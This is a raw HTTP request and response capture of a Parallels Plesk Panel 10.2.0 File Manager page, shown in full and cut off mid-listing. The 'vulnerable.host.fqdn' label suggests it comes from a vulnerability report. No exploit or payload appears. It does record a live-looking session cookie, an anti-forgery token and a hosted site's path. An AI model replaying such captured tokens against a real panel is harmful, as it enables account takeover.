Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:37 GMT
Connection: close
Content-Length: 56922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/rename/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <SPAN class="commonButton" id="bid-create-dir-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a folder in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_dir" disabled id="buttonid-create-dir-disabled" type="button">Add New Directory</BUTTON><SPAN id="spanid-create-dir-disabled">Add New Directory</SPAN></SPAN>
           <SPAN class="commonButton" id="bid-create-file-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a file in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_file" disabled id="buttonid-create-file-disabled" type="button">Add New File</BUTTON><SPAN id="spanid-create-file-disabled">Add New File</SPAN></SPAN>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>11 <A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_anon_ftp" value="anon_ftp" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();">anon_ftp</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=anon_ftp" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fanon_ftp" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_cgi-bin" value="cgi-bin" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();">cgi-bin</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=cgi-bin" onClick=";lon();" onMouseOver="e(event);" 